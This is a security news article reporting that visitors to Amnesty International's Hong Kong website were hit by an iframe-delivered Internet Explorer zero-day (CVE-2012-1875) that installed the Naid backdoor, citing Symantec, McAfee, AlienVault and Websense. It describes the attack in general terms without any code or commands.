Amnesty HK site visitors were slugged with IE zero day

‘Similar’ to Tencent-signed malware attack on Amnesty UK, says Symantec.

The zero day Internet Explorer (IE) attack McAfee discovered on June 1 was aimed at visitors of Amnesty International’s Hong Kong website, says Symantec.

The attackers injected an iframe into Amnesty’s Hong Kong site pointing to a Russian domain that hosted a JavaScript file. That file exploited the IE flaw, according to Symantec’s Security Response team.

Users exposed to the attack would have been presented with an error message stating the site was “under construction” while the exploit installed a downloader and backdoor trojan, which Symantec labels “Trojan.Naid”.

Symantec said it had seen Niad as early as January 2010, but only added a signature for it this week after McAfee researchers disclosed the vulnerability for Microsoft to patch.

Microsoft patched the flaw (CVE-2012-1875) in last week's security bulletin, which affected IE 6 through 9 across multiple versions of Windows.

Naid collects the domain names a user visits and their device’s unique identifier, and allows the attacker to issue remote commands to the PC over a proprietary protocol, said Symantec.

The exploit “seems to be very reliable” and the payload pointed to command and control servers hosted by Chinese ISP, China Shenzen Soul Tech, according to an analysis by Security firm AlienVault.

Symantec said the iframe has now been removed from Amnesty’s Hong Kong site, noting the attack's similarity to the one aimed at Amnesty International’s UK website visitors last month.

In that case, the certificate for the executable file was signed by Chinese ISP Tencent. The certificate had been in use for some time and did not appear to be revoked at the time of those attacks, according to Websense.

Amnesty’s Hong Kong site was last rigged in 2010, that occasion also involving an IE zero day to target users with malware.

Follow @CSO_Australia and sign up to the CSO Australia newsletter.